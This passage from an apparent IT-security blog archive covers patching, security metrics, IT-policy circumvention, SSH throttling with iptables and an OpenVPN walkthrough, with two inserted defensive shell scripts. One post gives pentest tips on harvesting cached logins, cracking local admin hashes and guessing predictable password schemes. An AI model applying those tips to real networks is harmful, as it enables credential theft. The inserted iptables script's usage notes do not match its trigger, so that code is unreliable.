    It is also time to have every company look into some sort of proxy solution for web traffic. Even if it is not robust and does active filtering or stripping of malicious files, it should at least log what is being visited and when. Multiple attempts to site xyz/123.htm accompanying every other hit is a good indicator after-the-fact.

    These sorts of blended attacks are nothing new, but it is somewhat new to have such attacks originate from the web browser, attack the network, and end with other web browsers. That's cool and scary at the same time.
    .: 10 reasons not to provide free tech support
    I was forwarded a list of 10 reasons not to provide free tech support by a coworker this morning. Not sure where she got it, but a quick Google search yielded the blog article I linked to, even if that wasn't the original.

    I've encountered most of these in my personal life at some point or other (even before I was interested in IT stuff!). I've even encountered some of these items on the job. People who ask personal tech questions outside of work are people just like those I work with. There are many times people at work ask business-related and non-business-related tech questions which get into these same pitfalls. I am particularly careful when managers and HR overtly ask or hint that they would like me to work on their troubled home systems. That's usually a lot to lose and very little to gain, and the odds are on the lose side.

    Manage expectations of those making the requests. Always be honest and open about your capabilities and how bad a problem is for the requestor. Some things are just not fixable or the odds are really against it. We're not gods, and sometimes we really can't fix everything or recover everything.

    Nonetheless, I still help out when I can, as I do like to learn and help others, even if it is largely pro-bono.
    .: large number of pdf and dat file mail spam
    Seems this morning has ushered in a slew of spam and possibly malicious pdf and dat emails coming in. I take it this is pretty new this morning since neither Postini nor McAfee have any blockings yet, and I'm hoping they are just spam and not something more sinister. We're watching our inbound mail and have actually blocked all mail with attachments until we learn more. Days like this make me wish I didn't have tons of projects and things to do and more time for incident response. :)
    .: big patch week
    It's been a busy week for vulnerabilities. Microsoft's normal round with server and client patches. Winpcap had a disclosure and update. Sun's Java. I just saw a Flash player disclosure on the FD mailing list. Even McAfee's ePO and Cisco's CallManager rang some up. It's one of those days that reminds me of a few things.

    1) Make sure that if you don't have the abilities to update all your workstations quickly, get that base image updated with the newest packages and installs so you stop rolling out outdated systems. Befriend your image guy/girl and make sure they have time and are appreciated. Volunteer to be a tester for any pilot deploys.

    2) Evaluate whether you need centralized Windows install/patch management like Altiris. Don't overlook the need for another body to be the Altiris expert, or to carve out significant time for someone to learn and manage it. It's not an install and forget app!

    3) If you don't do either of these, well, at least be aware of what your vulnerabilities are and make plans to mitigate or attack these issues in the future.

    4) And most importantly, to all the stay-at-home "IT admins" whose experience includes 5 years of their 1 office SOHO room and 7 years of IT journalism: "Go patch your shit. Come back to me after you're done, and start imagining doing that for 3,000 systems in 25 departments before cluttering my reader with the latest no-brainer 'best practices' that sound good on a dreamy sunny Saturday morning but have little basis in reality." (Yeah, I have a pet peeve right there, hehe...)
    .: late night thoughts on security metrics
    I have recently begun reading Andrew Jaquith's recent book called Security Metrics on, predictably, security metrics. Andrew runs the securitymetrics.org site and mailing list. So far I have been very intrigued by his approach from my standpoint of a technical guy who likely will one day be in IT/security management. Security metrics are an inevitability, so I might as well start thinking about it in my roles.

    Early on I was pleased to see Andrew tackle the problem of data sharing. It's one of those things I firmly believe is holding us back, and illustrates our problems (and stigmas) with sharing useful information with each other. If you know where I work, I certainly can't be very open about a damaging incident at work, especially if people at work may read my writings. And so on.

    I was also pleased to see him quickly tackle the problems with ALE (Annualized Loss Expectancy) and expose it for the guesswork that it really is. Many people I've talked to have insinuated their disdain at something like trying to predict ALE, although few go far enough to outright challenge the general (read: CISSP) acceptance of it as gospel. Likewise, he put good solid wording to my own intuitions about scorecards, grades, and health colors, namely that they're ambiguous and don't mean anything. They're really meant to start discussions, not quickly show value.

    I was surprised Andrew didn't use "pen-test" or "vuln assessment" terms when introducing his discussion on diagnostic measurements and hypotheses/subhypotheses. The method of answering diagnostic questions to prove or disprove a subhypothesis seems to be a vuln assessment to me.

    One part that rubbed me slightly wrong was in the Perimeter Security and Threats section, under Attacks (pg 51-52). Andrew says, "You'll note that [this]...leaves out such common statistics as the most commonly attacked ports and the most 'dangerous' external URLs. I have omitted them deliberately, because they don't pass the 'So what?' test." I'm a bit in Bejtlich's camp when it comes to measuring and knowing your threats. Some of these measures such as top 10 ports, top 10 attacking addresses, and top 10 URLs help an organization know their threats (attackers) better. Granted, I also buy that Andrew is looking into organizational effectiveness and efficiency, and that view can still survive without looking to the external threats. Metrics paint a good picture of the past, but some measures like top 10 ports may indicate something happening right this moment that may be of some concern. Still, a minor point and not worth arguing about at all, as I accept both him and my stances as just a matter of opinion.
    .: the good and bad types of icmp
    ICMP can be blocked or allowed, or one can instead allow the good stuff and block the unnecessary stuff. This paper should give the quick details on which is which. Gleaned from Shane Castle on the Security Catalyst forums.
    .: recovering damaged files
    Computer help questions come in many flavors, and while many requests get dodged, there are times when influential or attractive (wink wink) people ask favors that you don't want to dodge and would rather have a quick and impressive answer. One such situation involves the inevitable accidental file deletion or damaged disk recovery. Two such tools were recently posted to SearchWinComputing, Unstoppable Copier (gui) and Bad Block Copy (cli). There are other tools, but I've mentioned them elsewhere on here before (and recently too!). I'm sure there are other forensics tools that do this sort of stuff very nicely, but are likely cost-prohibitive for home users.
    .: apache server-status pages
    More fun web server tricks from Full-Disclosure today. Falling under the headings of "information disclosure" and "service fingerprinting" is an enabled server-status page in Apache. Go to your website and add "/server-status" to the end to get the information, kinda like on apache's site: http://www.apache.org/server-status. Unless you actually use it, disable mod_status or restrict its Location block to trusted addresses.
    .: a p2p witch hunt
    This article about the government's opinion on P2P networks (they claim it is the cause of sensitive gov't data being disclosed and is thus evil) is exactly what I thought when I first heard this story today. The use of P2P networks and applications is not the issue here. The issue is data protection and system control. Don't let your organization-owned systems have P2P software on them (there are plenty of ways to tackle this both on the systems and the network!). And keep track of your data so people don't bring it home and put it on little Stacy's computer running 3 default all-shared P2P apps 24/7. Pound in that this activity is against policy. Stop slapping wrists and start meting out real punishments to the employees for such violations.
    .: diving down into dns discussions
    I've recently read two interesting papers dealing with DNS-related attacks. First, Andrew Hay pointed over to a paper from the HoneyNet Project titled Know Your Enemy: Fast-Flux Service Networks. The HoneyNet Project is uniquely poised to do some things that most of us cannot autonomously do: monitor and trend threats. This position has allowed them to see fast-flux attacks first-hand, where DNS entries are changed dynamically to hide the source of malware downloads and controls. I'd be willing to bet this concept has been in use for quite some time, only many researchers fire off one or two lookups, report the resulting domains, and that's it. They likely never see the changes, and thus never realized they were not really doing much good.

    I also see that Trusteer has a paper hosted describing cache poisoning against BIND 9 by leveraging predictable transaction IDs to update DNS caching servers surreptitiously. While this seems a bit exotic, I wouldn't consider it too exotic. In fact, getting an outbound connection by an internal user shouldn't be a huge problem, and that could be a big payoff if you can poison some major DNS entries. I think the biggest problem is just making sure you're attacking a BIND 9 DNS caching server. I'll dive into this paper more than my casual glance tonight. Considering our malware prevalence today, I think this can be easily leveraged by existing maldoers, but may require a bit more targeting than blanket blind malware. I'm interested if the paper goes into countermeasures or how to combat this.

    Lastly, this paper hosted by InfosecWriters is an excellent primer on DNS and DNS security. I recently read a DNS paper that was really well written, and I think this was it. I'm not sure where I got the link from, however.
    .: interview with richard bejtlich
    A quick note that Marcin has posted an interview with Richard Bejtlich over on his blog, ts/sci-security. Richard hosts what is definitely one of my favorite blogs, writes excellent books, and basically is one of those zen masters of his field of expertise, namely network monitoring and everything that goes into that discipline. Of all the people I would love to learn from and work side-by-side with for a few years to sponge up information, he's near the top of the list, truly. I'd even fetch his coffee, give him massages, and frolic...er...someone stop this downward spiral..!
    .: embrace the passion
    Reading the Bejtlich interview sparked a thought. I read this in response to what makes a good network security analyst:
    First, you need to want to beat the bad guys. If you are entering the security field because you heard a commercial on the radio advertising higher pay, you will not get far.
    For some reason, this made me think of a mention that Marcin made recently along with pdp about the movie Hackers and/or that old "hacking" culture that seems missing lately.

    I need to give pdp proper kudos for coming out (hehe, read *that* link out of context why don't ya?) about the movie's influence on his life personally. There are few things more chic in digital security than bashing CISSP-holders, but bashing the movie Hackers is one of them. I love the movie for what it is, even if the details are dramatized heavily.

    At any rate, pdp and Marcin are both (independently and cooperatively at the same time, I think) looking to revive a little bit of that curious innocence and culture that the hacking scene has seen slowly disappear. This sounds fun and cool, and while the industry, technology, and hackers-turned-professionals have largely matured, we can still have a hell of a lot of fun in our little geek circles and keep things immature and fun as a way to keep our lives from becoming overgrown with the burden of the daily IT/security overwork. Embrace your inner deviate, if not in action, at least in thought.

    I think the bottom line is to just have enthusiastic, lifelong passion about this field. Live it, embrace it...but that last might be my hedonist side talking.
    .: boeing and sox auditing
    This article on Boeing and SOX is a pretty amazing example of how regulations affect the bottom line and the IT department. It also seems to illustrate how NOT to deal with audits; namely, they should be treated as a good thing, not just something to do to avoid a fine or bad news for the stakeholders. Once you start treating regulation and security like a bad step-father, you get auditors yelling at each other, overturning rulings by others, and otherwise get so much in-fighting that you paralyze yourself.

    Of course, it is easy for me as an armchair quarterback to say these things, and I'm sure the problems are way deeper than I could imagine. So here are some choice quotes I pulled out that apply to this generalization as well as overall IT/security intermingling.
    The level of rigor -- for example, documenting every single approval for a coding change -- was foreign to the get-things-done culture of Boeing's computer professionals.
    This is foreign to many shops. In fact, in my two major jobs, both have struggled to some degree with change management both in coding and also the infrastructure side. This is weak everywhere in the "just get it done" mentality that all business is permeated with.
    Senior managers said that compliance was always a top priority. But junior managers said they didn't have enough resources. Auditors said that the information technology department was too resistant to change. IT workers said that auditors kept changing their minds about what they wanted and were too eager to fail controls.
    That age-old gap between levels of management living in different worlds, or just plain not listening or providing proper resources to get things done. No one is working together, and it really sounds like making money and getting things done is top priority, not security or the audit. If security was the top priority, these friction points wouldn't exist.

    Either way, for all of us in IT and security, this is our reality and our balancing act. If you can't adapt and deal with not having enough resources for perfect security, you need a better line of work.
    .: on security metrics the book
    I just recently finished reading the excellent book, Security Metrics, Replacing Fear, Uncertainty, and Doubt, by Andrew Jaquith. Andrew has written a book, not that I would like to write someday, but a book about a topic that hasn't been written about before, and he certainly has something (many things!) to say about it.

    In fact, I have to make mention of a phrase that totally made me happy to see, since I rarely get such literary enjoyment from technical texts. On page 118, we have this gem: "perfidious outsourcers pilfering proprietary secrets."

    This book is definitely worthwhile for anyone who ever has to present security metrics as a part of their job. I would also recommend it for any security operations people who want to understand why some metrics should be gathered and how to better give your analysts and managers what they want. Likewise, any security operations people are likely the future analysts and managers anyway, so this makes for a very good early orientation to the important questions and how to appropriately answer them, let alone self-evaluate their own systems according to more appropriate metrics.
    .: ssh brute force protection via iptables
    I have protection on my SSH ports, but I wouldn't mind more. Honestly, it can't really hurt. This article by Kevin van Zonneveld on adding brute force protection to iptables (and your Ubuntu install) to help secure your SSH is a welcome addition. Far too often I read tidbits like this that stop at the first step: adding the iptables rules, and leave out all this other good stuff that Kevin goes into, like rummaging in cron to clean up rules, persisting the rules, and so on. I plan on adding this to my server in the next few. Thanks Kevin!

    As a side note, it's been over a year since I've been tinkering with iptables, so this will get me back on track as I've become rusty...
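    The usual way to throttle SSH brute forcing in iptables is the "recent" match: record every new connection per source address and drop a source once it has opened too many within a window. The function below is an added example of that rule set, not Kevin's rules and not something from the original post; the port (22), the threshold (4 attempts in 60 seconds) and the chain layout are my assumptions. By default it only prints the commands so the ordering can be reviewed; set IPTABLES=iptables and run as root to apply them.

```shell
#!/bin/sh
# Added example: SSH brute-force throttling with the iptables "recent" match.
# Each NEW SSH connection from a source is recorded in the "SSH" list; once a
# source has HITS entries within SECS seconds its further attempts are dropped,
# and because we use --update (not --rcheck) every attempt refreshes the timer,
# so an attacker that keeps hammering stays blocked.
# Assumed defaults: port 22, 4 hits, 60 seconds. Dry-run unless IPTABLES is set.

ssh_bruteforce_rules() {
  port="${1:-22}"; hits="${2:-4}"; secs="${3:-60}"
  ipt="${IPTABLES:-echo iptables}"   # IPTABLES=iptables (as root) to apply for real

  # 1. Already-established SSH sessions keep flowing whatever happens below.
  $ipt -A INPUT -p tcp --dport "$port" -m state --state ESTABLISHED,RELATED -j ACCEPT

  # 2. Record every new connection attempt from this source in the "SSH" list.
  $ipt -A INPUT -p tcp --dport "$port" -m state --state NEW -m recent --set --name SSH

  # 3. If the source now has >= hits entries inside the window, drop it.
  #    --rttl additionally requires the TTL to match the recorded one, which
  #    stops a spoofer from getting a legitimate address blocked.
  $ipt -A INPUT -p tcp --dport "$port" -m state --state NEW -m recent --update \
       --seconds "$secs" --hitcount "$hits" --rttl --name SSH -j DROP

  # 4. Otherwise let the new connection through. With -A, command order is
  #    chain order, so this ACCEPT must come after the DROP above.
  $ipt -A INPUT -p tcp --dport "$port" -m state --state NEW -j ACCEPT

  # Persistence is a separate step: e.g. iptables-save > /etc/iptables.rules
  # and iptables-restore it from an /etc/network/if-pre-up.d script.
}

# Usage: sh ssh_rules.sh            (dry run, prints the four rules)
#        IPTABLES=iptables sh ssh_rules.sh 22 4 60   (apply, as root)
if [ -n "$APPLY_SSH_RULES" ]; then
  ssh_bruteforce_rules "$@"
fi
```

    The DROP rule is deliberately placed before the general ACCEPT for new SSH connections; if your existing ruleset already accepts port 22 earlier in INPUT, these rules never see the packets and do nothing.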
    .: the beginning of a windows pentest encounter
    Here is a quick paper (notes) about pen-testing a Windows Active Directory network. While I do know this paper covers only the lowest-hanging fruit, it seems that all too often, these lowest-hanging fruit are the most common fruit found in the wild.

    I will add to make sure and grab the cached logins on the workstations attacked as well. Often, systems cache the default last 10 accounts, which almost always includes at least one admin-type account from desktop support or the person who made the image in the first place.

    If you crack the local admin password, don't just use it on other systems, but try to change obvious things in the password. If they're not the same across the department or even the company, often desktop support has some sort of predictable password scheme based on the computer name or user name or department. Heck, even I had a predictable one back when I did support, but you really had to work to guess it and I left plenty of red herrings laying around (like having the second half of the hash crack into a known word or just lower-case letters to throw off how complex the first half was...)
    .: the good and bad of the wsj article on ways to circumvent it
    What better time to release a blog-inspiring IT security article in the Wall Street Journal than when half the crowd is in Vegas for the week? Yes, the WSJ posted 10 Things Your IT Department Won't Tell You, which really should be reworded, 10 Ways to Circumvent Your IT Department's Restrictions. Here are some notes of mine on the article as a whole.

    A. The author needs to stress further that employees should look at their corporate policies and talk to their IT staff. Sometimes it just takes user interest to get management to look at legit technological solutions to the below problems, not workers sneaking around. I wonder if the WSJ wouldn't mind if its editors sent all their email to a third party service or stored their files online? It would just be nice if the author had constantly (or at least at the beginning) reminded readers that while this is all in good fun, they can be crossing policy lines.

    B. The author implies, or rather nearly flat-out states, that these items are part of a rather strict and unfriendly IT security stance. This is really not so. Some things like blocking certain websites are done almost as much for saving bandwidth costs as anything, or to prevent such things as porn viewing which can create a hostile work environment. Other things like email size requirements can be an external limitation by the Internet infrastructure at large (i.e. your target's mail servers). Likewise, storage is cheap, but try telling that to senior management when the Exchange servers start complaining and buckling and backups take too long. Alleviating that means spending money. And often management figures that money is better saved and file sizes remain reasonable. IT security is not the only force here, but rather simple economics in the IT world. Really, often it comes down to treating everyone equally and costs.

    C. Contrary to what every non-IT person seems to think, IT pros do not know everything or every piece of software. Limitations are often made so that we have a finite job description. Supporting every piece of software that even 50 users can install is frustrating and a drain on company money.

    D. I don't like the feeling that the author's Risks sections are skewed to the POV of the user, and not the business as a whole and how dangerous some of these practices may be. Some are properly framed while others are not.

    E. That all said, I think this is an important article. It illustrates the common pains our users (and we as well!!) have when it comes to the convergence of work, culture, technology, and social lives. Each of these pain points should be fixed by IT, or at least the policy behind them transparent to the constituents. Each of these should also be examined to see if, instead of benefiting the company and our employees as people, we're holding them back and trying in vain to stem the tides of culture and progress.

    1. HOW TO SEND GIANT FILES - How many companies really do need to send giant files and don't have any sort of FTP/SFTP infrastructure? No, your baby pictures in bitmap format and 10 times as big as modern monitor resolutions do not count as a business case. I am saddened to see the author tell users to look for the IE lock symbol as reassurance of validity, and that a Verisign logo further ensures the identity of the site. No, that's not enough, sorry. Oh, and if an Adobe exec runs it, it is less likely to have security holes. Say what? Anyway, IT does need a plan for transferring large files anyway, so get one. Everyone, and I mean everyone, hits the attachment max at some point. Hell, even Gmail has a max; live with it.

    2. HOW TO USE SOFTWARE THAT YOUR COMPANY WON'T LET YOU DOWNLOAD - This one really peeves me, because I've too often seen a) malware enter because someone wanted certain software, b) computers become unusable due to crappy software or incompatibilities with business software, and c) frustrated users who then frustrate IT because they MUST have some backwater POS software installed or they will quit, or something equally outlandish. The bane of all IT is having to support everyone's crap. Yes, I'm jaded on this point, but there is usually a process of requesting and approving software for use in the business. Good IT will log all executed software, and query on why they were run. And be aware of your company size. Small companies can likely get more software approved, but large or medium companies just cannot scale IT to support every little thing.

    3. HOW TO VISIT THE WEB SITES YOUR COMPANY BLOCKS - First, web-based email is not innocuous. Second, if your company blocks these sites actively, your proxy calls will likely be logged as well. If you need a site opened up or something, ask your manager, HR, or IT. If it is Final Four season and you can't stream the first round games, well, sorry, but we can't bring the internet access to a crawl just to see a 15 seed get crushed by a 2 seed in a game that will be played regardless if you are watching or not. And no, you can't connect to GoToMyPC.

    4. HOW TO CLEAR YOUR TRACKS ON YOUR WORK LAPTOP - I really like the author saying, "...don't use your work computer to do anything you wouldn't want your boss to know about." That's it in a nutshell right there; that should be everyone's personal policy.

    5. HOW TO SEARCH FOR YOUR WORK DOCUMENTS FROM HOME - Ugh. Don't ask your IT admin to help you set up Google Desktop. Bad. Ask how you can get set up with a VPN connection from home that is secure and allows you access to your computer or a file store. The author stupidly says three things that he/she should have put together. "...top-secret financial information..." and "...search company keeps a copy of your documents on its own server..." and "...myriad state laws regulate how a company has to react when it loses private information..." If you play the "duh" game, you see that you might have to provide some answers why you are allowing top secret, possibly regulated, information to be stored on third-party servers. Good job.

    6. HOW TO STORE WORK FILES ONLINE - Like web-based email services, thinking too much about this problem creates ulcers. Yes, I'd like to encourage my users to store their files on third party services, because then they can store megs and gigs of company data out there, then quit (or god forbid get fired), and leave the company with absolutely no means to recover, inventory, or secure that data. Brilliant. These services should be stopped via web filters and software install restrictions, let alone via policy. Oh, and kudos to the author to recommend USB and other portable devices in item #2, then calling them cumbersome in this one.

    7. HOW TO KEEP YOUR PRIVACY WHEN USING WEB EMAIL - These "nifty tricks" can spell doom for compliance, if that is your company's game. Tracking this stuff is such a grey area it's sick. Honestly, I don't like my stuff logged for perusal by my manager or HR; I really am part of the generation whose social lives tend to revolve around electronic means. But I do prefer to have things logged just in case, from both my personal POV and from the company POV. We need to make sure our processes and actions are transparent so that employees don't think we're reading their IM/email logs to get juicy gossip details. Chances are not good for that happening, sadly.

    8. HOW TO ACCESS YOUR WORK EMAIL REMOTELY WHEN YOUR COMPANY WON'T SPRING FOR A BLACKBERRY - Another ulcer about data free-flowing out the company door, but at least the author implores readers to talk to IT.

    9. HOW TO ACCESS YOUR PERSONAL EMAIL ON YOUR BLACKBERRY - I don't see a huge problem with this, until you a) run that attachment...oops, that was a virus and screw things up, b) can't get it to work and ask IT in which case we'll tell you no and watch you closer, or c) email that really important client from...oops, your personal email hotjerkyboy69foru from hotmail. Explain that to your boss...

    The last one is just a light-hearted gimme; a lame contrivance of journalistic levity.

    In the end, all of this comes down to a few protections by IT that can make a lot of these issues be blocked properly:
    i. software restrictions based on policy and technology, including executable logging
    ii. web filtering, or at least logging if not outright blocking
    iii. data privacy/sensitivity training and strict adherence to least privilege access rights, better yet, full logging of all data downloaded/viewed, but good luck with that
    iv. work with your users to overcome these challenges and find a happy middle ground
    .: one last wsj article thought
    One last thought has been tickling my mind when it came to that WSJ article I linked to the other day. It was about control and telling people not to cross the lines or do things they're not supposed to do. Think about that for a moment. How far would we get if everyone stayed between the lines? While there are some ethical near-absolutes like murder, most everything else is such small beans that pushing the boundaries now and then can be a good thing. Like working out, you can't build muscle without first making thousands of micro-tears to induce stronger rebuilding. Growing pains, which are going to be abundant in our culture and technology for some time. Even if we don't act on them, it is good to think about them and question our policilial (yes, I make up words) stances.

    Besides, even if our users know all this junk, we protect against it, right? Full disclosure?
    .: openvpn 2.0 on ubuntu 7.04
    I recently stood up an OpenVPN server at home. I've done SSH forwarding to protect my hotspot browsing habits in the past, but I thought I would try something new. I installed this on an Ubuntu 7.04 system that was running as a VMware guest OS. I opted to go with a routed (tun) VPN solution. The alternative is a bridged (tap) connection, which makes it seem like my VPN client system is right on my home network. My routed solution will rely on the Ubuntu server and my home Linksys router to route traffic from my VPN network (10.8.1.0/24) to my home network (192.168.10.0/24). I also make sure that I force my traffic through my VPN, rather than let it seep out in the clear at the hotspot (the push commands in the server.conf file later on). From bare start to finish, this entire setup can be done in under 15 minutes.

    I am not going to detail what each command does except in passing, because there is excellent documentation already available for OpenVPN. What I rarely see, however, is a quick walkthrough on how to set it all up on Ubuntu.

    I start out by installing the packages that I need. OpenSSL may not be needed, but I included it anyway. Likewise, bridge-utils is only needed for a bridged (tap) setup, and dnsmasq is there so the server can answer the DNS queries I push to clients.
    sudo -s
    apt-get install openvpn openssl bridge-utils dnsmasq
    mkdir /etc/openvpn/keys
    mkdir /etc/openvpn/configs
    nano /etc/openvpn/server.conf
    Server.conf is the server configuration file. The contents describe that I will run my server on the IP 192.168.10.108 and port 1194 udp. My VPN "network" will be in the 10.8.1.0 255.255.255.0 network. OpenVPN will grab 10.8.1.1 as the server, and my client will be given a similar address. Once my client is connected to my OpenVPN server, I should be able to ping 10.8.1.1 and verify I can talk to my server.
    port 1194
    local 192.168.10.108
    proto udp
    dev tun0
    ca keys/ca.crt
    cert keys/server.crt
    key keys/server.key
    dh keys/dh1024.pem
    server 10.8.1.0 255.255.255.0
    push "route 192.168.10.0 255.255.255.0"
    push "redirect-gateway def1"
    push "dhcp-option DNS 10.8.1.1"
    ifconfig-pool-persist client-addresses.txt
    client-to-client
    keepalive 10 120
    cipher AES-128-CBC
    comp-lzo
    user nobody
    group nogroup
    persist-key
    persist-tun
    status openvpn-status.log
    log openvpn
    verb 3
    mute 20
    The ifconfig-pool-persist directive makes OpenVPN remember which client (by certificate common name) got which address across restarts, and pre-seeding client-addresses.txt is a convenient way for me to control and track who gets what IP.
    nano /etc/openvpn/client-addresses.txt
    client1,10.8.1.6
    Next I take care of the keys I need, along with some other setup. When creating the keys, I don't set a passphrase, and I do select yes to sign and commit changes. Note that the server only needs ca.crt, not ca.key; the CA private key is what signs new client certificates, so keep it off the VPN server (ideally offline) rather than copying it alongside the server key.
    cd /usr/share/doc/openvpn/examples/easy-rsa/2.0
    nano ./vars
    #change values at the bottom and save
    source ./vars
    ./clean-all
    ./build-ca
    ./build-key-server server
    ./build-key client1
    ./build-dh
    cd keys
    cp ca.crt dh1024.pem server.key server.crt /etc/openvpn/keys
    cp client1.crt client1.key ca.crt /etc/openvpn/configs
    cd /etc/openvpn/configs
    nano client1.conf
    The file client1.conf is the client config file that needs to be given to the connecting client box. LVVPN is the name of my network adapter on the client. After installing the OpenVPN client on the Windows client, rename the TAP adapter it installs to this name; dev-node must match that adapter name exactly.
    client
    dev-node LVVPN
    proto udp
    dev tun
    remote www.terminal23.net 1194
    persist-key
    persist-tun
    ca ca.crt
    cert client1.crt
    key client1.key
    cipher AES-128-CBC
    comp-lzo
    verb 3
    mute 20
    I need to get the client files to the client. I do this by copying them to the client's home directory, then connecting via SSH to get them. Since I'm running all of this as root, I need to adjust the client1.key file so the client can grab it via SSH, otherwise I'll get a permission error. (chmod 604 makes the private key world-readable; chown'ing the copies to the SSH user is cleaner, and either way tighten the permissions back down once the file is on the client.) The ta.key generated here is an HMAC key for OpenVPN's tls-auth option; it only does anything if you add "tls-auth ta.key 0" to server.conf, "tls-auth ta.key 1" to client1.conf, and copy it to the client as well, which the configs above don't do. I then start the service by hand for testing (the Ubuntu package's init script will start every *.conf in /etc/openvpn at boot).
    cd /etc/openvpn
    openvpn --genkey --secret ta.key
    cd /etc/openvpn/configs
    cp client1.crt client1.key client1.conf ca.crt /home/michael
    chmod 604 /home/michael/client1.key
    #copy files via SSH to client into openvpn/configs folder
    cd ..
    openvpn /etc/openvpn/server.conf &
    I'm never satisfied with just doing something, I usually need to verify it. I do this by making sure the service is running and that it is listening on the expected port.
    netstat -a | grep 1194
    ps -ax | grep vpn
    Finally, I need two more commands to enable IP forwarding and NAT for my particular setup. The /proc write does not survive a reboot; set net.ipv4.ip_forward=1 in /etc/sysctl.conf to make it permanent.
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A POSTROUTING -s 10.8.1.0/24 -o eth0 -j MASQUERADE
    Since my home Linksys router is limited to a GUI, it is a bit hard to detail what I did to set up my route. I just added a new route in the Advanced Routing section. Destination LAN IP is 10.8.1.0, subnet mask 255.255.255.0, and default gateway 192.168.10.108. This was set up to let me talk to my internal systems. I also had to port forward my VPN port to this system. This means that after I'm connected, I can ping 10.8.1.1 to verify I am on my VPNs network. I can then ping 192.168.10.1 (or a valid, responsive host on my home network) and I should get a response if forwarding is working.

    From here, start up the client's VPN however you like. Many people start it up by right-clicking the client1.ovpn file (rename client1.conf to client1.ovpn) and choosing to start it as an openvpn connection. I like the tool OpenVPN GUI for Windows. This is merely a personal preference since I like the sys tray interface.
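    A misspelled path in server.conf only shows up as a startup failure, so before starting the daemon it is worth checking that every file the config points at exists. The script below is an added example and not part of the original walkthrough; it assumes relative paths are resolved from the config file's directory, which is what you get when starting openvpn from /etc/openvpn as above, and the fixture it builds (empty placeholder key files and a minimal server.conf) is constructed purely for the demonstration.

```shell
#!/bin/sh
# Added example: sanity-check an OpenVPN server.conf before starting the daemon.
# Every file directive (ca, cert, key, dh, tls-auth, crl-verify) is resolved
# relative to the config's directory and reported if it does not exist. A
# ta.key lying next to the config with no tls-auth directive is also flagged,
# since that means the HMAC key is generated but unused.
# Assumption: relative paths resolve from the config's directory (start openvpn
# from there, as the walkthrough does).

check_openvpn_conf() {
  conf="$1"
  dir=$(dirname "$conf")
  rc=0
  for directive in ca cert key dh tls-auth crl-verify; do
    # strip comments, then print the first argument of each matching directive
    for f in $(sed 's/[#;].*//' "$conf" | awk -v d="$directive" '$1 == d { print $2 }'); do
      case "$f" in
        /*) path="$f" ;;
        *)  path="$dir/$f" ;;
      esac
      if [ ! -r "$path" ]; then
        echo "$directive: missing file $path" >&2
        rc=1
      fi
    done
  done
  if [ -r "$dir/ta.key" ] && ! sed 's/[#;].*//' "$conf" | grep -q '^tls-auth'; then
    echo "warning: $dir/ta.key exists but no tls-auth directive references it" >&2
  fi
  return $rc
}

# Constructed fixture: placeholder key files plus a minimal server.conf whose
# cert path is taken from $2, so a typo such as kets/server.crt can be tested.
make_fixture() {
  mkdir -p "$1/keys"
  for f in ca.crt server.crt server.key dh1024.pem; do : > "$1/keys/$f"; done
  cat > "$1/server.conf" <<EOF
port 1194
proto udp
dev tun0
# ca keys/old-ca.crt        <- commented-out directive must be ignored
ca keys/ca.crt
cert $2
key keys/server.key
dh keys/dh1024.pem
server 10.8.1.0 255.255.255.0
EOF
}

# Run the checker against a fixture and report "ok" or "bad" as a value, which
# is easier to assert on than an exit status when the caller uses set -e.
demo() {
  t=$(mktemp -d)
  make_fixture "$t" "$1"
  if check_openvpn_conf "$t/server.conf" 2>/dev/null; then r=ok; else r=bad; fi
  rm -rf "$t"
  echo "$r"
}

# Usage: sh check_openvpn_conf.sh /etc/openvpn/server.conf
if [ $# -gt 0 ]; then
  check_openvpn_conf "$1"
fi
```

    Running it against the real config before "openvpn /etc/openvpn/server.conf &" turns a silent daemon death into an explicit "cert: missing file" line, and the tls-auth warning catches the case where ta.key was generated but never wired into either config.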
    .: openvpn 2.0 on ubuntu 7.04 in the wild and on video
    I decided to screw around some more and actually recorded the creation of my OpenVPN server. I did this mostly to do something I've never done before: make a video of something and cut it.

    I used VNC on a Windows box to connect to my Ubuntu 7.04 server. I then recorded that window using Camtasia Studio 3.1, which I also used to add music, edit, and produce. The music is Baja by Sasha. The codec (Cinepak codec by Radius) is the only codec available by default in Camtasia that worked on both my Windows box using VLC and Windows Media Player, and also on my Ubuntu laptop using MPlayer. If it doesn't work for you, I suggest those players, or tough luck. Maybe I'll choose something better and smaller next time, but for now, this was just a learning experience for me.

    The video is over 190MB and runs 12:35. I don't have a real hoster, so I'll leave this video up for a few weeks (or hours if it brings me to a crawl!). If it is not available and you want it, email me and we'll figure something out.

    Suggestions are very welcome, but be aware I know this was a very amateur deal. :)
    .: ten most overlooked aspects of security
    In late 2006, DarkReading published the 10 most overlooked aspects of security, which I think will end up holding true for a very long time.
    .: bookpool sale on addison-wesley and prentice hall books
    I dig BookPool.com; I've used them for many of my book purchases over the years, only occasionally delving into Borders/Barnes & Noble/Amazon when I have gift certs or for impulse buys. Today I pre-ordered Virtual Honeypots. This looks to be an awesome how-to sort of book about honeypots; something I've been eagerly waiting to delve into. It should be out any day, really. This was prompted by a welcome spam email from BookPool about a sale on Addison-Wesley and Prentice Hall books.

    I'm also eagerly awaiting the Metasploit Toolkit book, despite being published by Syngress (in my opinion, the spottiest tech book publisher with quality all over the place....and I just don't like holding their books like I do Addison-Wesley books). There's a lot of new stuff in Metasploit 3, and I'm holding out really getting into it (like I used Metasploit 2x) until this book comes out. I may combine this with looking into Ruby or Python a bit more. Of all the tool-books out there, only BackTrack comes to mind as needing an updated book (BackTrack 3 perhaps?).

    I also see Wi-Foo II has been pushed back (or maybe it was really tentative at late 2007 months ago) into 2008. I'm looking forward to this book as well. The first book was awesome, but got mired down in the technical problems of getting wireless working properly in Linux, which is a requirement for the subject. These days, wireless support is much easier and better, which hopefully means less mud devoted to the intricacies and details. Other books cover it well lately anyway, like Hacking Exposed: Wireless and Syngress' Wardriving and Wireless Penetration Testing. Although not without their own minor faults, both are excellent wireless security books.
    .: five essential laptop security tips from security-hacks
    A list of 5 essential laptop security tips leaves an important one out and includes a rather dubious entry. Tip #5, install tracking software on your laptop in case it gets stolen. While a neat, feel-good type of geeky thing to install, this is pretty lame for inclusion on a top 5 list. Then again, maybe this list was meant as more of a physical security list, in which case, top 5 is really "the 5 things to do."

